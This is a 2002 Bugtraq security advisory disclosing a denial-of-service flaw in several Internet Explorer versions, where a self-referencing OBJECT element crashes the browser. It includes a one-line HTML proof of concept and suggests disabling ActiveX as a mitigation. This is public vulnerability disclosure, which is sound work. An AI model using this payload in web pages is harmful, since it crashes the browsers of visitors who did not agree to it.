[25197] in bugtraq
DoS in Multiple IE Versions (Self-Referenced Directives)
daemon@ATHENA.MIT.EDU (Matthew Murphy)
Sat Apr 20 16:31:45 2002
Message-ID: <000a01c1e882$da16bbc0$dd301c41@kc.rr.com>
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: <news@securiteam.com>, <bugtraq@securityfocus.com>
Date: Sat, 20 Apr 2002 10:48:43 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
The Flaw
OBJECT elements are used for embedded OLE in HTML documents. A flaw in
the way Microsoft Internet Explorer processes this directive allows a page
that causes a loop in object dependancy, or loads itself in a certain manner
in an OBJECT, to completely crash Internet Explorer.
The Exploit
To date, I have discovered 4 points of exploitation to crash the
browser. My favorite example is this one:
---- [ CRASH.HTM ] ----
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
---- [ CRASH.HTM ] ----
IE dies inside shdocvw.dll with a call stack overflow.
Fixes
Set "Run ActiveX Controls and Plugins" to disabled in ALL zones. An XML
Island DSO may even be able to get past this, however. I would expect this
bug to fixed in a future IE service pack, though there's been no
confirmation/details of that from Microsoft.
